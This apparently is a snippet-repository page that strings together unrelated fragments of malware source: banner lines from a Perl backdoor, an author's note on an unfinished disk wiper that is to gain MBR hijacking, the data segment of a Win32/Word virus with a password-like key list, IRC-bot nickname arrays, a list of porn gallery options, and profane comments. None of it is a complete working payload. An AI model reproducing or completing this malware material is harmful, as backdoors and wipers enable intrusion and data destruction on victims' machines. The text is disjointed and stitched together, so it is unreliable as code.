Repositories (1)

9 snippets stored for this repo
JavaScript IconJavaScript
<option value="bdsm">Free BDSM Gallery</option>
<option value="breast">Free BREAST Gallery</option>
<option value="colleggirls">Free COLLEGGIRLS Gallery</option>
<option value="cumshot">Free CUMSHOT Gallery</option>
<option value="ethnic">Free ETHNIC Gallery</option>
<option value="fetish">Free FETISH Gallery</option>
<option value="gay">Free GAY Gallery</option>
Perl IconPerl
   # BackDoor Whore 0.8
   # Author: ntfx <[email protected]> (Tony Spilotro)
Perl IconPerl
print "##################################\n";
   print "#Backdoor Whore  By ntfx         #\n";
   print "#Contact: <ntfx\>      #\n";
hello! this is the early development stage that this wiper is currently at.
at the current time this is the first major section finished. MBR hijacking still has to be implemented and will take some time to work out.
i am a single person doing this in my free-time. so please dont try to piss me off about the code being trash.

please run in debug mode. i have not setup the release version yet.
_DATA  segment dword use32 public 'DATA'

   tit    db 'W32/Wm.Cocaine by Vecna', 0
   msg    db 'Cocaine - A Win32/WinWord Virus#'
          db 'Cocaine - Your PC is now addicted', 0
key04 db 'friends',0
            key05 db 'airplane',0
            key06 db 'ferrari',0
            key07 db 'orgasm',0
            key08 db 'friendship',0
            key09 db 'fuck',0
            key10 db 'love',0
Perl IconPerl
"Ketika Rasa Tak Dapat Diungkap Bro",
    "Percuma Kita Bersama DinDa",
    "klepek_klepek Memang cakep",
    "Suka Nonton Movie hentai la",
    "Lihat Cewek2 Pake tanktop",
    "Owned By AnakDompu");
my $nick = $nickname[rand scalar @nickname];
Perl IconPerl
"Ketika Rasa Tak Dapat Diungkap Bro",
    "Percuma Kita Bersama DinDa",
    "Shinchi Memang cakep",
    "Suka Nonton Movie hentai la",
    "Lihat Cewek2 Pake tanktop",
    "Owned By AnakDompu");
my $nick = $nickname[rand scalar @nickname];
   # Once upon a flame came a blue bird...
   # i grabbed my rifle and shot the shot the son of a bitch
   # the cops came, i ran like hell...
   # i fucked my transmission
   # ocifer i swear the drunk i'm not god